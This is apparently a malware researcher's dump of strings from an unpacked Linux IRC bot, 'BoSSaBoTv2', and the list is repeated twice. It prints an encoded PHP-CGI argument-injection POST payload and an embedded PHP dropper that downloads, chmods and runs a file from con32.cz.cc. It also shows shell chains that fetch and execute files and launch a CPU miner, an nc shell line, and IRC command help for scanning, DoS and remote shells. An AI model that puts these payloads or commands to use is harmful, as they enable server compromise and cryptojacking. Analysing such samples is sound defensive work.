- # Fur Malekal, ELF IRC skids, von #MalwareMustDie
- # Code: BossaBot
- # Strings from the unpacked binaries (file offset, string):
- ---------
- 0000000000F4 /lib/ld-linux.so.2
- 00000000087D libpthread.so.0
- 00000000088D waitpid
- 00000000089A connect
- 0000000008A2 pthread_exit
- 0000000008AF pthread_create
- 0000000008BE system
- 0000000008CA accept
- 0000000008D1 write
- 0000000008E1 sendto
- 0000000008ED sigaction
- 0000000008F7 __errno_location
- 000000000908 _Jv_RegisterClasses
- 00000000091C libc.so.6
- 000000000926 strcpy
- 00000000092D ioctl
- 000000000933 stdout
- 00000000093A vsprintf
- 000000000943 strerror
- 00000000094C snprintf
- 000000000955 __strtol_internal
- 000000000967 getpid
- 00000000096E fgets
- 000000000974 memcpy
- 00000000097B pclose
- 000000000987 malloc
- 00000000098E sleep
- 000000000994 sysinfo
- 00000000099C socket
- 0000000009A3 select
- 0000000009AA fflush
- 0000000009B1 alarm
- 0000000009B7 popen
- 0000000009BD calloc
- 0000000009C9 strcat
- 0000000009D5 inet_addr
- 0000000009DF setsockopt
- 0000000009EA strstr
- 0000000009F1 strncpy
- 0000000009F9 strcasecmp
- 000000000A04 __strdup
- 000000000A0D bcopy
- 000000000A13 strtok
- 000000000A1A listen
- 000000000A21 sscanf
- 000000000A28 inet_network
- 000000000A35 memset
- 000000000A3C srand
- 000000000A42 getppid
- 000000000A4F getcwd
- 000000000A56 gethostbyname
- 000000000A64 fgetc
- 000000000A6A fclose
- 000000000A71 __ctype_b_loc
- 000000000A7F access
- 000000000A86 __xstat
- 000000000A8E inet_ntop
- 000000000A98 fopen
- 000000000A9E _IO_stdin_used
- 000000000AAD daemon
- 000000000AB4 __libc_start_main
- 000000000AC6 toupper
- 000000000ACE strchr
- 000000000AD5 fputs
- 000000000ADB mkdir
- 000000000AE1 vfprintf
- 000000000AEF __gmon_start__
- 000000000AFE GLIBC_2.1
- 000000000B08 GLIBC_2.0
- 000000000B12 GLIBC_2.3
- 000000001555 G ]~4=
- 00000000177E t,PRh
- 000000001DDE Sj$h
- 00000000349F YXj:S
- 000000003A1E 4$WSh
- 000000004F25 u&PSh
- 000000005D28 haxmedown.cz.cc
- 000000005D38 %s : USERID : UNIX : %s
- 000000005D51 NOTICE %s :Unknowning %s.
- 000000005D6C NOTICE %s :Unable to comply.
- 000000005D8A /cgi-bin/php
- 000000005D97 /cgi-bin/php5
- 000000005DA5 /cgi-bin/php-cgi
- 000000005DB6 /cgi-bin/php.cgi
- 000000005DC7 /cgi-bin/php4
- 000000005DD5 /cgi-bin/php5-cgi
- 000000005DE7 /cgi-bin/php4-cgi
- 000000005DF9 /cgi-bin/php5.cgi
- 000000005E0B /cgi-bin/php4.cgi
- 000000005E1D /cgi-bin/php52.cgi
- 000000005E30 /cgi-bin/php53.cgi
- 000000005E43 /cgi-bin/
- 000000005E4D /cgi-sys/php-cgi
- 000000005E5E /cgi-bin/info.php
- 000000005E70 /cgi-bin/php.fcgi
- 000000005E82 /cgi-bin/phpinfo.php
- 000000005E9C Permission denied
- 000000005EAE %d.%d.%d.%d
- 000000005EBA %s.%i.%i.%i
- 000000005EC6 %s.%i.%i
- 000000005ECF %s.%i
- 000000005ED5 NOTICE %s :
- 000000005EF3 devchan
- 000000005F03 http://
- 000000005F0C ./cache/
- 000000005F15 %s %s %s
- 000000005F22 HTTP/1.1
- 000000005F2B HTTP/1.0
- 000000005F34 ./cache/%s
- 000000005F3F Date:
- 000000005F45 HTTP/%f %d
- 000000005F50 %%%02X
- 000000005F57 %hu.%hu.%hu.%hu
- 000000005F67 UPDATE
- 000000005F6E UNKNOWN
- 000000005F7B SERVER
- 000000005F82 VERSION
- 000000005F8F SCANRND
- 000000005F97 SCANSUBA
- 000000005FA0 SCANSUBB
- 000000005FA9 SCANSUBC
- 000000005FB7 SHELL
- 000000005FBD PROXY
- 000000005FC3 SOCKS5
- 000000005FCA MINER
- 000000005FD9 NOTICE %s :%s
- 000000005FF8 PRIVMSG
- 000000006005 TOPIC
- 00000000600B /etc/init.d/rc.local
- 000000006020 "%s%s"
- 00000000602A [sshd]
- 000000006036 ERROR
- 00000000603C /etc/rc.conf
- 000000006049 rm -r /tmp/pool*
- 00000000605A dummy
- 000000006060 4L2nJG5V
- 000000006069 NOTICE %s :UPDATEING
- 00000000607F Linux
- 000000006085 NICK %s
- 00000000608E NOTICE %s :NICK <nick>
- 0000000060A6 NOTICE %s :MOVE <server>
- 0000000060C0 MODE %s -x
- 0000000060CC MODE %s +i
- 0000000060D8 JOIN %s :%s
- 0000000060E5 WHO %s
- 0000000060ED PONG %s
- 000000006100 NOTICE %s :Removed all spoofs
- 000000006120 NOTICE %s :What kind of subnet address is that? Do something like: 169.40
- 000000006180 NOTICE %s :Unable to resolve %s
- 0000000061C0 NOTICE %s :UNKNOWN <target> <secs>
- 000000006200 POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D% 0000000065DF 0 Host: %s
- 0000000065E9 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
- 000000006638 Content-Type: application/x-www-form-urlencoded
- 000000006669 Content-Length: %d
- 00000000667D Connection: close
- 0000000066A0 <?php
- 0000000066A6 $tmp = sys_get_temp_dir();
- 0000000066C1 $path = getcwd();
- 0000000066D3 $file = "4L2nJG5V";
- 0000000066E7 $url = "con32.cz.cc";
- 0000000066FD $wget = "wget";
- 00000000670D $flag = "-P - -O";
- 000000006720 $chmod = "chmod -R 777";
- 000000006739 if (file_exists($tmp . "/$file"))
- 00000000675D exit(1);
- 000000006766 }else{
- 00000000676D echo($tmp);
- 000000006779 system("$wget $url $flag" . $tmp . "/$file");
- 0000000067A7 system("$chmod" . $tmp ."/$file");
- 0000000067CA chmod ($tmp."/".$file,0777);
- 0000000067E7 system($tmp . "/$file 2>&1");
- 000000006805 exit(1);
- 000000006820 /cgi-bin/php5.cgi-20120725_by_SAKUR
- 000000006860 /phpMyAdmin/config/config.inc.php
- 0000000068A0 /phpmyadmin/config/config.inc.php
- 0000000068E0 NOTICE %s :
- 0000000068FD [EXPLOiTiNG-IP:-%s-]
- 000000006940 NOTICE %s :
- 00000000695D [Permission-denied:-%s-]
- 0000000069A0 NOTICE %s :
- 0000000069B4 [RANDOM-SCAN-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]-TIME-[-%s-]
- 000000006A00 NOTICE %s :
- 000000006A14 [WAITING-OF-THREADS]
- 000000006A40 NOTICE %s :
- 000000006A54 [SCAN-DONE]
- 000000006A80 NOTICE %s :
- 000000006A94 [SCAN-RUNNING!!!]
- 000000006AC0 NOTICE %s :
- 000000006AD4 [SUBNET-SCAN-A-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
- 000000006B20 NOTICE %s :
- 000000006B34 [WAITING-OF-THREADS]
- 000000006B60 NOTICE %s :
- 000000006B74 [SCAN-RUNNING!!!
- 000000006BA0 NOTICE %s :
- 000000006BB4 [SUBNET-SCAN-B-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
- 000000006C00 NOTICE %s :
- 000000006C14 [SUBNET-SCAN-C-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
- 000000006C60 NOTICE %s :
- 000000006CA0 NOTICE %s :
- 000000006CC2 BoSSaBoTv2 by BoSSaLiNiE
- 000000006CE0 NOTICE %s :
- 000000006D60 NOTICE %s :
- 000000006DA0 NOTICE %s :
- 000000006DC2 HELP
- 000000006DE0 NOTICE %s :
- 000000006DFC PRIVAT PRIVAT PRIVAT
- 000000006E20 NOTICE %s :
- 000000006E3C ALL COMMMANDS STARTS WITH !BOSS* or !BOSS|[500]*
- 000000006E80 NOTICE %s :
- 000000006E9C OR THE COMPLETE BOT !NICKNAME FOR CONTROLL ONLY ONE BOT
- 000000006EE0 NOTICE %s :
- 000000006EFC example !BOSS* scanrnd 192.168 500 30
- 000000006F40 NOTICE %s :
- 000000006F62 SCANNING
- 000000006F80 NOTICE %s :
- 000000006F9C SCANRND <192 or 192.168 or 192.168.0> <threads> <minutes> = Random Scan
- 000000007000 NOTICE %s :
- 00000000701C SCANSUBA <192> <threads> = Complete Subnet scan
- 000000007080 NOTICE %s :
- 00000000709C SCANSUBB <192.168> <threads> = Complete Subnet scan
- 000000007100 NOTICE %s :
- 00000000711C SCANSUBC <192.168.0> <threads> = Complete Subnet scan
- 000000007180 NOTICE %s :
- 0000000071A2 DoS
- 0000000071C0 NOTICE %s :
- 0000000071DC UNKNOWN <target> <secs>
- 000000007200 NOTICE %s :
- 00000000721C NOTE YOU CANT STOP RUNNING SCANS
- 000000007240 NOTICE %s :
- 000000007262 WARNING
- 000000007280 NOTICE %s :
- 00000000729C DO NOT ENTER MORE WHITE SPACES THAT ARE NEEDED
- 0000000072E0 NOTICE %s :
- 0000000072FC scanrnd 192.168.0 500 100 IS WRONG BOT WILL NOT SCAN
- 000000007340 NOTICE %s :
- 00000000735C scanrnd 192.168.0 500 100 IS WRONG BOT WILL NOT SCAN
- 0000000073A0 NOTICE %s :
- 0000000073BC scanrnd 192.168.0 500 100 IS RIGHT BOT WILL SCAN
- 000000007400 NOTICE %s :
- 000000007422 REMOTE
- 000000007440 NOTICE %s :
- 00000000745C REMOTE CONTROLL SHELL
- 000000007480 NOTICE %s :
- 00000000749C !BOSS* SH uname -a
- 0000000074C0 NOTICE %s :
- 0000000074DC REMOTE CONTROLL IRC
- 000000007500 NOTICE %s :
- 00000000751C !BOSS* IRC join #bitchly
- 000000007540 NOTICE %s :
- 00000000755C REMOTE BIND SHELL
- 000000007580 NOTICE %s :
- 00000000759C !BOSS* SHELL
- 0000000075C0 NOTICE %s :
- 0000000075DC nc -vvn 192.168.0.1 31337
- 000000007600 NOTICE %s :
- 000000007622 EOH
- 000000007640 NOTICE %s :
- 000000007654 GENERATING
- 000000007680 NOTICE %s :
- 000000007694 STARTING
- 0000000076C0 NOTICE %s :
- 0000000076D4 SOCKET
- 0000000076DD CREATED
- 000000007700 NOTICE %s :
- 000000007740 NOTICE %s :
- 000000007754 WAITING
- 00000000775E CONNECTION
- 000000007780 NOTICE %s :
- 000000007794 INCOMMING
- 0000000077A0 CONNECTION
- 0000000077C9 BoSSaBoTv2
- 0000000077D6 ACCESS
- 0000000077DF GRANTED
- 000000007832 Enter password:
- 00000000786A BoSSaBoTv2
- 000000007877 REMOTE
- 000000007880 SHELL
- 0000000078E0 NOTICE %s :
- 0000000078F4 DISCONNECTED
- 000000007960 NOTICE %s :
- 0000000079A0 NOTICE %s :
- 0000000079B4 SOCKET
- 0000000079BD ERROR
- 0000000079E0 NOTICE %s :
- 0000000079F4 PROXY
- 0000000079FC SERVER
- 000000007A05 READY
- 000000007A20 400 : BAD REQUEST
- 000000007A32 ONLY GET REQUESTS ARE ALLOWED
- 000000007A60 GET %s HTTP/1.0
- 000000007A71 Host: %s
- 000000007A7B If-Modified-Since: %s
- 000000007A92 Connection: close
- 000000007AC0 GET %s HTTP/1.0
- 000000007AD1 Host: %s
- 000000007ADB Connection: close
- 000000007B00 NOTICE %s :
- 000000007B14 SOCKS5
- 000000007B1D SERVER
- 000000007B26 READY
- 000000007B33 PORT %d
- 000000007B40 export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
- 000000007B80 NICK %s
- 000000007B88 USER %s localhost localhost :%s
- 000000007BC0 /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &
- 000000007C20 pkill minerd ; pkill m32 ; pkill m64
- 000000007C60 wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz -P /tmp
- 000000007CC0 tar -zxf /tmp/pooler-cpuminer-2.4-linux-x86.tar.gz -C /tmp
- 000000007D00 NOTICE %s :BTC CPU Miner Running For %s:%s with User %s:%s
- 000000007D40 pkill %s ; pkill %s ; rm -r /tmp/%s ; rm -r /tmp/%s ; wget %s -P - -O /tmp/%s ; wget %s -P - -O /tmp/%s ; chmod 777 /tmp/%s ; chmod 777 /tmp/%s ; /tmp/%s ; /tmp/%s
- 000000007E00 NOTICE %s :
- 000000007E1D BoSSaBoTv2-%s
- 000000007E60 NOTICE %s :Nick cannot be larger than 9 characters.
- 000000008361 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 000000008394 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0000000083C7 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0000000083FA GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 00000000842D GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 000000008460 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 000000008493 .shstrtab
- 00000000849D .interp
- 0000000084A5 .note.ABI-tag
- 0000000084B3 .hash
- 0000000084B9 .dynsym
- 0000000084C1 .dynstr
- 0000000084C9 .gnu.version
- 0000000084D6 .gnu.version_r
- 0000000084E5 .rel.dyn
- 0000000084EE .rel.plt
- 0000000084F7 .init
- 0000000084FD .text
- 000000008503 .fini
- 000000008509 .rodata
- 000000008511 .eh_frame
- 00000000851B .data
- 000000008521 .dynamic
- 00000000852A .ctors
- 000000008531 .dtors
- 000000008547 .comment
- 0000000000F4 /lib/ld-linux.so.2
- 00000000087D libpthread.so.0
- 00000000088D waitpid
- 00000000089A connect
- 0000000008A2 pthread_exit
- 0000000008AF pthread_create
- 0000000008BE system
- 0000000008CA accept
- 0000000008D1 write
- 0000000008E1 sendto
- 0000000008ED sigaction
- 0000000008F7 __errno_location
- 000000000908 _Jv_RegisterClasses
- 00000000091C libc.so.6
- 000000000926 strcpy
- 00000000092D ioctl
- 000000000933 stdout
- 00000000093A vsprintf
- 000000000943 strerror
- 00000000094C snprintf
- 000000000955 __strtol_internal
- 000000000967 getpid
- 00000000096E fgets
- 000000000974 memcpy
- 00000000097B pclose
- 000000000987 malloc
- 00000000098E sleep
- 000000000994 sysinfo
- 00000000099C socket
- 0000000009A3 select
- 0000000009AA fflush
- 0000000009B1 alarm
- 0000000009B7 popen
- 0000000009BD calloc
- 0000000009C9 strcat
- 0000000009D5 inet_addr
- 0000000009DF setsockopt
- 0000000009EA strstr
- 0000000009F1 strncpy
- 0000000009F9 strcasecmp
- 000000000A04 __strdup
- 000000000A0D bcopy
- 000000000A13 strtok
- 000000000A1A listen
- 000000000A21 sscanf
- 000000000A28 inet_network
- 000000000A35 memset
- 000000000A3C srand
- 000000000A42 getppid
- 000000000A4F getcwd
- 000000000A56 gethostbyname
- 000000000A64 fgetc
- 000000000A6A fclose
- 000000000A71 __ctype_b_loc
- 000000000A7F access
- 000000000A86 __xstat
- 000000000A8E inet_ntop
- 000000000A98 fopen
- 000000000A9E _IO_stdin_used
- 000000000AAD daemon
- 000000000AB4 __libc_start_main
- 000000000AC6 toupper
- 000000000ACE strchr
- 000000000AD5 fputs
- 000000000ADB mkdir
- 000000000AE1 vfprintf
- 000000000AEF __gmon_start__
- 000000000AFE GLIBC_2.1
- 000000000B08 GLIBC_2.0
- 000000000B12 GLIBC_2.3
- 000000001555 G ]~4=
- 00000000177E t,PRh
- 000000001DDE Sj$h
- 00000000349F YXj:S
- 000000003A1E 4$WSh
- 000000004F25 u&PSh
- 000000005D28 haxmedown.cz.cc
- 000000005D38 %s : USERID : UNIX : %s
- 000000005D51 NOTICE %s :Unknowning %s.
- 000000005D6C NOTICE %s :Unable to comply.
- 000000005D8A /cgi-bin/php
- 000000005D97 /cgi-bin/php5
- 000000005DA5 /cgi-bin/php-cgi
- 000000005DB6 /cgi-bin/php.cgi
- 000000005DC7 /cgi-bin/php4
- 000000005DD5 /cgi-bin/php5-cgi
- 000000005DE7 /cgi-bin/php4-cgi
- 000000005DF9 /cgi-bin/php5.cgi
- 000000005E0B /cgi-bin/php4.cgi
- 000000005E1D /cgi-bin/php52.cgi
- 000000005E30 /cgi-bin/php53.cgi
- 000000005E43 /cgi-bin/
- 000000005E4D /cgi-sys/php-cgi
- 000000005E5E /cgi-bin/info.php
- 000000005E70 /cgi-bin/php.fcgi
- 000000005E82 /cgi-bin/phpinfo.php
- 000000005E9C Permission denied
- 000000005EAE %d.%d.%d.%d
- 000000005EBA %s.%i.%i.%i
- 000000005EC6 %s.%i.%i
- 000000005ECF %s.%i
- 000000005ED5 NOTICE %s :
- 000000005EF3 devchan
- 000000005F03 http://
- 000000005F0C ./cache/
- 000000005F15 %s %s %s
- 000000005F22 HTTP/1.1
- 000000005F2B HTTP/1.0
- 000000005F34 ./cache/%s
- 000000005F3F Date:
- 000000005F45 HTTP/%f %d
- 000000005F50 %%%02X
- 000000005F57 %hu.%hu.%hu.%hu
- 000000005F67 UPDATE
- 000000005F6E UNKNOWN
- 000000005F7B SERVER
- 000000005F82 VERSION
- 000000005F8F SCANRND
- 000000005F97 SCANSUBA
- 000000005FA0 SCANSUBB
- 000000005FA9 SCANSUBC
- 000000005FB7 SHELL
- 000000005FBD PROXY
- 000000005FC3 SOCKS5
- 000000005FCA MINER
- 000000005FD9 NOTICE %s :%s
- 000000005FF8 PRIVMSG
- 000000006005 TOPIC
- 00000000600B /etc/init.d/rc.local
- 000000006020 "%s%s"
- 00000000602A [sshd]
- 000000006036 ERROR
- 00000000603C /etc/rc.conf
- 000000006049 rm -r /tmp/pool*
- 00000000605A dummy
- 000000006060 4L2nJG5V
- 000000006069 NOTICE %s :UPDATEING
- 00000000607F Linux
- 000000006085 NICK %s
- 00000000608E NOTICE %s :NICK <nick>
- 0000000060A6 NOTICE %s :MOVE <server>
- 0000000060C0 MODE %s -x
- 0000000060CC MODE %s +i
- 0000000060D8 JOIN %s :%s
- 0000000060E5 WHO %s
- 0000000060ED PONG %s
- 000000006100 NOTICE %s :Removed all spoofs
- 000000006120 NOTICE %s :What kind of subnet address is that? Do something like: 169.40
- 000000006180 NOTICE %s :Unable to resolve %s
- 0000000061C0 NOTICE %s :UNKNOWN <target> <secs>
- 000000006200 POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D% 0000000065DF 0 Host: %s
- 0000000065E9 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
- 000000006638 Content-Type: application/x-www-form-urlencoded
- 000000006669 Content-Length: %d
- 00000000667D Connection: close
- 0000000066A0 <?php
- 0000000066A6 $tmp = sys_get_temp_dir();
- 0000000066C1 $path = getcwd();
- 0000000066D3 $file = "4L2nJG5V";
- 0000000066E7 $url = "con32.cz.cc";
- 0000000066FD $wget = "wget";
- 00000000670D $flag = "-P - -O";
- 000000006720 $chmod = "chmod -R 777";
- 000000006739 if (file_exists($tmp . "/$file"))
- 00000000675D exit(1);
- 000000006766 }else{
- 00000000676D echo($tmp);
- 000000006779 system("$wget $url $flag" . $tmp . "/$file");
- 0000000067A7 system("$chmod" . $tmp ."/$file");
- 0000000067CA chmod ($tmp."/".$file,0777);
- 0000000067E7 system($tmp . "/$file 2>&1");
- 000000006805 exit(1);
- 000000006820 /cgi-bin/php5.cgi-20120725_by_SAKUR
- 000000006860 /phpMyAdmin/config/config.inc.php
- 0000000068A0 /phpmyadmin/config/config.inc.php
- 0000000068E0 NOTICE %s :
- 0000000068FD [EXPLOiTiNG-IP:-%s-]
- 000000006940 NOTICE %s :
- 00000000695D [Permission-denied:-%s-]
- 0000000069A0 NOTICE %s :
- 0000000069B4 [RANDOM-SCAN-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]-TIME-[-%s-]
- 000000006A00 NOTICE %s :
- 000000006A14 [WAITING-OF-THREADS]
- 000000006A40 NOTICE %s :
- 000000006A54 [SCAN-DONE]
- 000000006A80 NOTICE %s :
- 000000006A94 [SCAN-RUNNING!!!]
- 000000006AC0 NOTICE %s :
- 000000006AD4 [SUBNET-SCAN-A-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
- 000000006B20 NOTICE %s :
- 000000006B34 [WAITING-OF-THREADS]
- 000000006B60 NOTICE %s :
- 000000006B74 [SCAN-RUNNING!!!
- 000000006BA0 NOTICE %s :
- 000000006BB4 [SUBNET-SCAN-B-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
- 000000006C00 NOTICE %s :
- 000000006C14 [SUBNET-SCAN-C-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
- 000000006C60 NOTICE %s :
- 000000006CA0 NOTICE %s :
- 000000006CC2 BoSSaBoTv2 by BoSSaLiNiE
- 000000006CE0 NOTICE %s :
- 000000006D60 NOTICE %s :
- 000000006DA0 NOTICE %s :
- 000000006DC2 HELP
- 000000006DE0 NOTICE %s :
- 000000006DFC PRIVAT PRIVAT PRIVAT
- 000000006E20 NOTICE %s :
- 000000006E3C ALL COMMMANDS STARTS WITH !BOSS* or !BOSS|[500]*
- 000000006E80 NOTICE %s :
- 000000006E9C OR THE COMPLETE BOT !NICKNAME FOR CONTROLL ONLY ONE BOT
- 000000006EE0 NOTICE %s :
- 000000006EFC example !BOSS* scanrnd 192.168 500 30
- 000000006F40 NOTICE %s :
- 000000006F62 SCANNING
- 000000006F80 NOTICE %s :
- 000000006F9C SCANRND <192 or 192.168 or 192.168.0> <threads> <minutes> = Random Scan
- 000000007000 NOTICE %s :
- 00000000701C SCANSUBA <192> <threads> = Complete Subnet scan
- 000000007080 NOTICE %s :
- 00000000709C SCANSUBB <192.168> <threads> = Complete Subnet scan
- 000000007100 NOTICE %s :
- 00000000711C SCANSUBC <192.168.0> <threads> = Complete Subnet scan
- 000000007180 NOTICE %s :
- 0000000071A2 DoS
- 0000000071C0 NOTICE %s :
- 0000000071DC UNKNOWN <target> <secs>
- 000000007200 NOTICE %s :
- 00000000721C NOTE YOU CANT STOP RUNNING SCANS
- 000000007240 NOTICE %s :
- 000000007262 WARNING
- 000000007280 NOTICE %s :
- 00000000729C DO NOT ENTER MORE WHITE SPACES THAT ARE NEEDED
- 0000000072E0 NOTICE %s :
- 0000000072FC scanrnd 192.168.0 500 100 IS WRONG BOT WILL NOT SCAN
- 000000007340 NOTICE %s :
- 00000000735C scanrnd 192.168.0 500 100 IS WRONG BOT WILL NOT SCAN
- 0000000073A0 NOTICE %s :
- 0000000073BC scanrnd 192.168.0 500 100 IS RIGHT BOT WILL SCAN
- 000000007400 NOTICE %s :
- 000000007422 REMOTE
- 000000007440 NOTICE %s :
- 00000000745C REMOTE CONTROLL SHELL
- 000000007480 NOTICE %s :
- 00000000749C !BOSS* SH uname -a
- 0000000074C0 NOTICE %s :
- 0000000074DC REMOTE CONTROLL IRC
- 000000007500 NOTICE %s :
- 00000000751C !BOSS* IRC join #bitchly
- 000000007540 NOTICE %s :
- 00000000755C REMOTE BIND SHELL
- 000000007580 NOTICE %s :
- 00000000759C !BOSS* SHELL
- 0000000075C0 NOTICE %s :
- 0000000075DC nc -vvn 192.168.0.1 31337
- 000000007600 NOTICE %s :
- 000000007622 EOH
- 000000007640 NOTICE %s :
- 000000007654 GENERATING
- 000000007680 NOTICE %s :
- 000000007694 STARTING
- 0000000076C0 NOTICE %s :
- 0000000076D4 SOCKET
- 0000000076DD CREATED
- 000000007700 NOTICE %s :
- 000000007740 NOTICE %s :
- 000000007754 WAITING
- 00000000775E CONNECTION
- 000000007780 NOTICE %s :
- 000000007794 INCOMMING
- 0000000077A0 CONNECTION
- 0000000077C9 BoSSaBoTv2
- 0000000077D6 ACCESS
- 0000000077DF GRANTED
- 000000007832 Enter password:
- 00000000786A BoSSaBoTv2
- 000000007877 REMOTE
- 000000007880 SHELL
- 0000000078E0 NOTICE %s :
- 0000000078F4 DISCONNECTED
- 000000007960 NOTICE %s :
- 0000000079A0 NOTICE %s :
- 0000000079B4 SOCKET
- 0000000079BD ERROR
- 0000000079E0 NOTICE %s :
- 0000000079F4 PROXY
- 0000000079FC SERVER
- 000000007A05 READY
- 000000007A20 400 : BAD REQUEST
- 000000007A32 ONLY GET REQUESTS ARE ALLOWED
- 000000007A60 GET %s HTTP/1.0
- 000000007A71 Host: %s
- 000000007A7B If-Modified-Since: %s
- 000000007A92 Connection: close
- 000000007AC0 GET %s HTTP/1.0
- 000000007AD1 Host: %s
- 000000007ADB Connection: close
- 000000007B00 NOTICE %s :
- 000000007B14 SOCKS5
- 000000007B1D SERVER
- 000000007B26 READY
- 000000007B33 PORT %d
- 000000007B40 export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
- 000000007B80 NICK %s
- 000000007B88 USER %s localhost localhost :%s
- 000000007BC0 /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &
- 000000007C20 pkill minerd ; pkill m32 ; pkill m64
- 000000007C60 wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz -P /tmp
- 000000007CC0 tar -zxf /tmp/pooler-cpuminer-2.4-linux-x86.tar.gz -C /tmp
- 000000007D00 NOTICE %s :BTC CPU Miner Running For %s:%s with User %s:%s
- 000000007D40 pkill %s ; pkill %s ; rm -r /tmp/%s ; rm -r /tmp/%s ; wget %s -P - -O /tmp/%s ; wget %s -P - -O /tmp/%s ; chmod 777 /tmp/%s ; chmod 777 /tmp/%s ; /tmp/%s ; /tmp/%s
- 000000007E00 NOTICE %s :
- 000000007E1D BoSSaBoTv2-%s
- 000000007E60 NOTICE %s :Nick cannot be larger than 9 characters.
- 000000008361 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 000000008394 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0000000083C7 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 0000000083FA GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 00000000842D GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 000000008460 GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
- 000000008493 .shstrtab
- 00000000849D .interp
- 0000000084A5 .note.ABI-tag
- 0000000084B3 .hash
- 0000000084B9 .dynsym
- 0000000084C1 .dynstr
- 0000000084C9 .gnu.version
- 0000000084D6 .gnu.version_r
- 0000000084E5 .rel.dyn
- 0000000084EE .rel.plt
- 0000000084F7 .init
- 0000000084FD .text
- 000000008503 .fini
- 000000008509 .rodata
- 000000008511 .eh_frame
- 00000000851B .data
- 000000008521 .dynamic
- 00000000852A .ctors
- 000000008531 .dtors
- 000000008547 .comment
- # Download of the payload URL, as logged (wget debug output):
- --2014-08-26 23:25:20-- http://con32.cz.cc/4L2nJG5VxX
